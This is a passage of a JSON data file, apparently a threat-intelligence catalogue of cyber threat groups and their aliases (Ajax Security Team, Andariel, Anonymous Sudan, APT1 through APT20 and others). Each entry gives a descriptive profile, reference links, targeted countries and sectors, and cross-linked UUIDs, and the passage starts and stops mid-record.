](https://app.tidalcyber.com/references/ab669ded-e659-4313-b5ab-8c5362562f39)]", + "meta": { + "id": "930c273b-0f2f-4398-b016-3623a384e681" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "similar" + } + ], + "uuid": "aea21266-a894-40a3-a8cd-2eb2136859d8", + "value": "Flying Kitten" + }, + { + "description": "[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", + "meta": { + "id": "b62221c3-4173-4748-9f3c-c1bc57ca2ef3" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "similar" + } + ], + "uuid": "c7e17231-5a22-49f8-a174-b15d5143b169", + "value": "Operation Saffron Rose" + }, + { + "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and Rocket Kitten.[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)][[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]", + "meta": { + "id": "59646b90-8877-4904-b72d-7b73ee8af863" + }, + "related": [ + { + "dest-uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "type": "similar" + } + ], + "uuid": "ed2a8933-1662-460c-b400-db7a03921659", + "value": "Rocket Kitten" + }, + { + "description": "[Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", + "meta": { + "group_attack_id": "G0130", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "9585b539-c040-40a6-a94c-fcf8afa786e2", + "type": "similar" + }, + { + "dest-uuid": "81051e64-7fde-44c5-816e-a85b25a02e11", + "type": "similar" + }, + { + "dest-uuid": "aea21266-a894-40a3-a8cd-2eb2136859d8", + "type": "similar" + }, + { + "dest-uuid": "c7e17231-5a22-49f8-a174-b15d5143b169", + "type": "similar" + }, + { + "dest-uuid": "ed2a8933-1662-460c-b400-db7a03921659", + "type": "similar" + } + ], + "uuid": "e38bcb42-12c1-4202-a794-ec26cd830caa", + "value": "Ajax Security Team" + }, + { + "description": "[[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]", + "meta": { + "id": "8f90a9f3-849e-4cd8-b276-42498b6968e2" + }, + "related": [ + { + "dest-uuid": "2cc997b5-5076-4eef-9974-f54387614f46", + "type": "similar" + } + ], + "uuid": "045b431e-ca2a-4b1b-a6fa-758127ce2b4e", + "value": "Silent Chollima" + }, + { + "description": "[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.[[FSI Andariel Campaign Rifle July 2017](https://app.tidalcyber.com/references/bde61ee9-16f9-4bd9-a847-5cc9df21335c)][[IssueMakersLab Andariel GoldenAxe May 2017](https://app.tidalcyber.com/references/10a21964-d31f-40af-bf32-5ccd7d8c99a2)][[AhnLab Andariel Subgroup of Lazarus June 2018](https://app.tidalcyber.com/references/bbc66e9f-98f9-4e34-b568-2833ea536f2e)][[TrendMicro New Andariel Tactics July 2018](https://app.tidalcyber.com/references/b667eb44-8c2f-4319-bc93-f03610214b8b)][[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]\n\n[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is considered a sub-set of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), and has been attributed to North Korea's Reconnaissance General Bureau.[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", + "meta": { + "country": "KP", + "group_attack_id": "G0138", + "observed_countries": [ + "BR", + "CA", + "CN", + "DE", + "IN", + "IL", + "JP", + "KR", + "NO", + "PH", + "RO", + "RU", + "SE", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage", + "Destruction" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Agriculture", + "Casinos Gambling", + "Defense", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Media", + "Pharmaceuticals", + "Technology", + "Travel Services" + ] + }, + "related": [ + { + "dest-uuid": "045b431e-ca2a-4b1b-a6fa-758127ce2b4e", + "type": "similar" + } + ], + "uuid": "2cc997b5-5076-4eef-9974-f54387614f46", + "value": "Andariel" + }, + { + "description": "AnonGhost is an apparent hacktivist collective. In October 2023, following a series of air- and land-based attacks in the Gaza Strip, AnonGhost was one of several hacktivist groups that claimed responsibility for disruptive attacks against computer networks in Israel. Researchers indicated that they observed AnonGhost actors exploit an undisclosed API vulnerability in Red Alert, an application that provides warning of projectile attacks in Israel, using Python scripts to intercept web requests and send spam messages to the app's users.[[Group-IB Threat Intelligence Tweet October 9 2023](/references/2df546ed-6577-44b2-9b26-0a17c3622df7)]", + "meta": { + "group_attack_id": "G5011", + "observed_countries": [ + "IL", + "US" + ], + "observed_motivations": [], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [], + "target_categories": [ + "Education", + "Government", + "Technology" + ] + }, + "related": [], + "uuid": "67e02e39-1db8-4842-b0b1-d250ea9a22c3", + "value": "AnonGhost" + }, + { + "description": "[[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)]", + "meta": { + "id": "84d7b5cd-a34d-4365-bdbf-cba51ef26fa9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "132feaeb-a9a1-4ecc-b7e9-86c008c15218", + "type": "similar" + } + ], + "uuid": "8a3ffc59-378f-447a-bd67-129659941a20", + "value": "Storm-1359" + }, + { + "description": "Anonymous Sudan is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) and website defacement attacks in support of its ideology, which appears to largely align with Russian state interests. The group regularly cross-promotes communications with Killnet, another hacktivist group that appears to share similar ideologies and methods of operation.[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)] Researchers assess that the group is affiliated with neither the Anonymous hacktivist group nor Sudan.[[CyberCX Anonymous Sudan June 19 2023](/references/68ded9b7-3042-44e0-8bf7-cdba2174a3d8)]\n\nSince emerging in January 2023, Anonymous Sudan has claimed and is believed to be responsible for a considerable number of DDoS attacks affecting victims in a wide range of geographic locations and sectors.[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)] It claimed responsibility for a series of early June 2023 DDoS attacks that caused temporary interruptions to Microsoft Azure, Outlook, and OneDrive services. Microsoft security researchers attributed those attacks to the Storm-1359 group.[[The Hacker News Microsoft DDoS June 19 2023](/references/2ee27b55-b7a7-40a8-8c0b-5e28943cd273)][[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)] Like Killnet, Anonymous Sudan claimed responsibility for disruptive attacks against computer networks in Israel following a series of air- and land-based attacks in the Gaza Strip in October 2023.[[FalconFeedsio Tweet October 9 2023](/references/e9810a28-f060-468b-b4ea-ffed9403ae8b)]", + "meta": { + "group_attack_id": "G5010", + "observed_countries": [ + "AU", + "DK", + "FR", + "DE", + "IR", + "IL", + "LV", + "NL", + "SE", + "AE", + "US" + ], + "observed_motivations": [], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [ + "62bde669-3020-4682-be68-36c83b2588a4" + ], + "target_categories": [ + "Aerospace", + "Banks", + "Education", + "Financial Services", + "Government", + "Healthcare", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "8a3ffc59-378f-447a-bd67-129659941a20", + "type": "similar" + } + ], + "uuid": "132feaeb-a9a1-4ecc-b7e9-86c008c15218", + "value": "Anonymous Sudan" + }, + { + "description": "[Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) and UNC94, based on malware, infrastructure, and targets.[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]", + "meta": { + "group_attack_id": "G1007", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "454402a3-0503-45bf-b2e0-177fa2e2d412", + "value": "Aoqin Dragon" + }, + { + "description": "[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "id": "af30fa7e-afcf-4da0-9771-9dfbe389f238" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "similar" + } + ], + "uuid": "b618f5c9-c399-4b6e-a614-12a383ba363c", + "value": "Comment Group" + }, + { + "description": "[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", + "meta": { + "id": "cc50c7a6-2dab-498f-992b-7cdda0c20b7e" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "similar" + } + ], + "uuid": "22829c72-7358-468d-b661-da019a020d6e", + "value": "Comment Panda" + }, + { + "description": "[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "id": "1c4be283-01e5-4fa8-b566-79bded25cab0" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "similar" + } + ], + "uuid": "88a50fe2-ab89-4dc3-8c47-0b0661f5c8e2", + "value": "Comment Crew" + }, + { + "description": "[APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. [[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "country": "CN", + "group_attack_id": "G0006", + "observed_countries": [ + "BE", + "CA", + "FR", + "IN", + "IL", + "JP", + "KR", + "LU", + "NO", + "SG", + "ZA", + "CH", + "TW", + "AE", + "GB", + "US", + "VN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Agriculture", + "Chemical", + "Construction", + "Education", + "Electronics", + "Energy", + "Entertainment", + "Financial Services", + "Healthcare", + "Legal", + "Manufacturing", + "Media", + "Mining", + "Technology", + "Telecommunications", + "Transportation" + ] + }, + "related": [ + { + "dest-uuid": "1cb7e1cc-d695-42b1-92f4-fd0112a3c9be", + "type": "similar" + }, + { + "dest-uuid": "b618f5c9-c399-4b6e-a614-12a383ba363c", + "type": "similar" + }, + { + "dest-uuid": "22829c72-7358-468d-b661-da019a020d6e", + "type": "similar" + }, + { + "dest-uuid": "88a50fe2-ab89-4dc3-8c47-0b0661f5c8e2", + "type": "similar" + } + ], + "uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "value": "APT1" + }, + { + "description": "[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)] [[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", + "meta": { + "id": "539a41fe-6f8f-496b-9915-4302797d33ca" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "similar" + } + ], + "uuid": "583a2f5d-33db-48b0-9809-5183f4d4dbec", + "value": "DynCalc" + }, + { + "description": "[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)] [[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", + "meta": { + "id": "1bc197b3-bd5f-4c3f-853d-56a8e37af86d" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "similar" + } + ], + "uuid": "3a506347-4e45-4afe-a15a-3c5697ecf07b", + "value": "IXESHE" + }, + { + "description": "[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]", + "meta": { + "id": "894ed5d0-7eb7-4383-b06f-9cc82d4aa1a6" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "similar" + } + ], + "uuid": "5142b9b1-ad6a-4d7b-b982-9b200169dfe5", + "value": "Numbered Panda" + }, + { + "description": "[[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", + "meta": { + "id": "11ad1ce8-e59f-48e8-8a52-f7012c9a0d4f" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "similar" + } + ], + "uuid": "1f696314-a0e0-4bc2-8b82-26d7f98bb308", + "value": "DNSCALC" + }, + { + "description": "[APT12](https://app.tidalcyber.com/groups/225314a7-8f40-48d4-9cff-3ec39b177762) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]", + "meta": { + "country": "CN", + "group_attack_id": "G0005", + "observed_countries": [ + "DE", + "JP", + "TW", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "High Tech", + "Media" + ] + }, + "related": [ + { + "dest-uuid": "583a2f5d-33db-48b0-9809-5183f4d4dbec", + "type": "similar" + }, + { + "dest-uuid": "3a506347-4e45-4afe-a15a-3c5697ecf07b", + "type": "similar" + }, + { + "dest-uuid": "5142b9b1-ad6a-4d7b-b982-9b200169dfe5", + "type": "similar" + }, + { + "dest-uuid": "1f696314-a0e0-4bc2-8b82-26d7f98bb308", + "type": "similar" + } + ], + "uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "value": "APT12" + }, + { + "description": "[APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. [[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]", + "meta": { + "country": "CN", + "group_attack_id": "G0023", + "observed_countries": [ + "JP", + "TW", + "TH" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Financial Services", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "1f73e14f-b882-4032-a565-26dc653b0daf", + "type": "similar" + } + ], + "uuid": "06a05175-0812-44f5-a529-30eba07d1762", + "value": "APT16" + }, + { + "description": "[[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]", + "meta": { + "id": "b357afb9-0349-4203-a083-5dd2f1f9ead0" + }, + "related": [ + { + "dest-uuid": "5f083251-f5dc-459a-abfc-47a1aa7f5094", + "type": "similar" + } + ], + "uuid": "3df7e342-600a-4312-8e16-5496890302d5", + "value": "Deputy Dog" + }, + { + "description": "[APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. [[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]", + "meta": { + "country": "CN", + "group_attack_id": "G0025", + "observed_countries": [ + "BE", + "CN", + "DE", + "ID", + "IT", + "JP", + "NL", + "RU", + "CH", + "GB", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government", + "Legal", + "Mining", + "NGOs", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "99e30d89-9361-4b73-a999-9e5ff9320bcb", + "type": "similar" + }, + { + "dest-uuid": "3df7e342-600a-4312-8e16-5496890302d5", + "type": "similar" + } + ], + "uuid": "5f083251-f5dc-459a-abfc-47a1aa7f5094", + "value": "APT17" + }, + { + "description": "[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)][[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]", + "meta": { + "id": "a13f9607-2ef4-43c7-8aa9-26b83c7b0967" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "similar" + } + ], + "uuid": "5fdf8c44-69f3-4d9b-9258-0bb7758be2e9", + "value": "TG-0416" + }, + { + "description": "[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)][[Anomali Evasive Maneuvers July 2015](https://app.tidalcyber.com/references/471ae30c-2753-468e-8e4d-6e7a3be599c9)]", + "meta": { + "id": "bb6b1708-cf48-48c7-9f46-ef0a53885d9a" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "similar" + } + ], + "uuid": "637ac710-fc16-472c-a832-4cac678250f8", + "value": "Dynamite Panda" + }, + { + "description": "[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]", + "meta": { + "id": "ffe44646-5353-49d5-8e26-410c1ce6df86" + }, + "related": [ + { + "dest-uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "type": "similar" + } + ], + "uuid": "3a92b51b-3fb6-4792-99f3-dfd2e16f9d8b", + "value": "Threat Group-0416" + }, + { + "description": "[APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. [[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]", + "meta": { + "group_attack_id": "G0026", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "Healthcare", + "Human Rights", + "Manufacturing", + "Pharmaceuticals", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "9a683d9c-8f7d-43df-bba2-ad0ca71e277c", + "type": "similar" + }, + { + "dest-uuid": "5fdf8c44-69f3-4d9b-9258-0bb7758be2e9", + "type": "similar" + }, + { + "dest-uuid": "637ac710-fc16-472c-a832-4cac678250f8", + "type": "similar" + }, + { + "dest-uuid": "3a92b51b-3fb6-4792-99f3-dfd2e16f9d8b", + "type": "similar" + } + ], + "uuid": "a0c31021-b281-4c41-9855-436768299fe7", + "value": "APT18" + }, + { + "description": "[[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]", + "meta": { + "id": "04c4f789-2393-4714-ab28-06fc38039960" + }, + "related": [ + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "similar" + } + ], + "uuid": "6d83a49f-9211-4cba-ac43-e00ac72377db", + "value": "Codoso" + }, + { + "description": "[[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]", + "meta": { + "id": "4addd000-b8b9-4c93-ba5b-378c14c46ae7" + }, + "related": [ + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "similar" + } + ], + "uuid": "89f839e7-602e-4862-9f93-1092acec19e7", + "value": "C0d0so0" + }, + { + "description": "[[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)]", + "meta": { + "id": "ace4b025-4fd3-4ddd-af6f-673dea88aa9f" + }, + "related": [ + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "similar" + } + ], + "uuid": "e5363e5c-073d-4bb4-9c68-9944251ff7a8", + "value": "Codoso Team" + }, + { + "description": "[[Dark Reading Codoso Feb 2015](https://app.tidalcyber.com/references/c24035b1-2021-44ae-b01e-651e44526737)]", + "meta": { + "id": "eb91a5a0-73b5-4552-87a7-2100812fc442" + }, + "related": [ + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "similar" + } + ], + "uuid": "1447143d-e8bf-448d-92df-67f19ac2e850", + "value": "Sunshop Group" + }, + { + "description": "[APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. [[FireEye APT19](https://app.tidalcyber.com/references/d75508b1-8b85-47c9-a087-bc64e8e4cb33)] Some analysts track [APT19](https://app.tidalcyber.com/groups/713e2963-fbf4-406f-a8cf-6a4489d90439) and [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) as the same group, but it is unclear from open source information if the groups are the same. [[ICIT China's Espionage Jul 2016](https://app.tidalcyber.com/references/1a824860-6978-454d-963a-a56414a4312b)] [[FireEye APT Groups](https://app.tidalcyber.com/references/5b6b909d-870a-4d14-85ec-6aa14e598740)] [[Unit 42 C0d0so0 Jan 2016](https://app.tidalcyber.com/references/c740fc1c-093e-4389-890e-1fd88a824df4)]", + "meta": { + "country": "CN", + "group_attack_id": "G0073", + "observed_countries": [ + "AU", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Energy", + "Financial Services", + "Legal", + "Manufacturing", + "Pharmaceuticals", + "Technology", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "066d25c1-71bd-4bd4-8ca7-edbba00063f4", + "type": "similar" + }, + { + "dest-uuid": "6d83a49f-9211-4cba-ac43-e00ac72377db", + "type": "similar" + }, + { + "dest-uuid": "89f839e7-602e-4862-9f93-1092acec19e7", + "type": "similar" + }, + { + "dest-uuid": "e5363e5c-073d-4bb4-9c68-9944251ff7a8", + "type": "similar" + }, + { + "dest-uuid": "1447143d-e8bf-448d-92df-67f19ac2e850", + "type": "similar" + } + ], + "uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "value": "APT19" + }, + { + "description": "", + "meta": { + "id": "7446e519-930c-416c-bcf9-55a8819a2630", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "similar" + } + ], + "uuid": "9d19037b-5996-473a-9c75-1896ba436adc", + "value": "VIOLIN PANDA" + }, + { + "description": "", + "meta": { + "id": "84038ade-9caf-40f8-9660-cd0459f65d81", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "similar" + } + ], + "uuid": "f233d85e-9274-4e5d-9eb8-57fa3dc6bebf", + "value": "TH3Bug" + }, + { + "description": "[[Unit 42 ATOM Crawling Taurus](/references/75098b2c-4928-4e3f-9bcc-b4f6b8de96f8)]", + "meta": { + "id": "1fe02736-3a38-4a71-b117-63c5386f15fb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "similar" + } + ], + "uuid": "c8c1b25e-4066-44c1-bb17-f561c86d8202", + "value": "Crawling Taurus" + }, + { + "description": "[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)]", + "meta": { + "id": "4812c101-e6cf-48c1-a1cd-640a1131ff22", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "similar" + } + ], + "uuid": "276fd84a-14fa-4040-9a98-f5eb09a24f3f", + "value": "Twivy" + }, + { + "description": "APT20 is a suspected China-attributed espionage actor. It has attacked organizations in a wide range of verticals for data theft. These operations appear to be motivated by the acquisition of intellectual property but also collection of information around individuals with particular political interests.[[Mandiant APT Groups List](/references/c984fcfc-1bfd-4b1e-9034-a6ff3e6ebf97)] Researchers attributed, with medium confidence, the years-long Operation Wocao espionage campaign to APT20.[[FoxIT Wocao December 2019](/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]", + "meta": { + "country": "CN", + "group_attack_id": "G5006", + "observed_countries": [ + "BR", + "CN", + "FR", + "DE", + "IT", + "MX", + "PT", + "ES", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [], + "target_categories": [ + "Aerospace", + "Casinos Gambling", + "Chemical", + "Construction", + "Defense", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Insurance", + "Manufacturing", + "Non Profit", + "Retail", + "Technology", + "Transportation" + ] + }, + "related": [ + { + "dest-uuid": "9d19037b-5996-473a-9c75-1896ba436adc", + "type": "similar" + }, + { + "dest-uuid": "f233d85e-9274-4e5d-9eb8-57fa3dc6bebf", + "type": "similar" + }, + { + "dest-uuid": "c8c1b25e-4066-44c1-bb17-f561c86d8202", + "type": "similar" + }, + { + "dest-uuid": "276fd84a-14fa-4040-9a98-f5eb09a24f3f", + "type": "similar" + } + ], + "uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "value": "APT20" + }, + { + "description": "[[Secureworks IRON TWILIGHT Profile](https://app.tidalcyber.com/references/2fc5b9dc-3745-4760-b116-5cc5abb9101d)][[Secureworks IRON TWILIGHT Active Measures March 2017](https://app.tidalcyber.com/references/0d28c882-5175-4bcf-9c82-e6c4394326b6)]", + "meta": { + "id": "6a42e6dd-3e4e-475f-8293-59d9af80e394" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "fc8d868d-e3df-486d-8efb-eed4d3554abe", + "value": "IRON TWILIGHT" + }, + { + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://app.tidalcyber.com/software/d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae).[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)]", + "meta": { + "id": "56f38218-30ad-4c58-8943-9b68103d91fa" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "78e2b73c-4042-4c78-af27-c289450e9db1", + "value": "Sednit" + }, + { + "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", + "meta": { + "id": 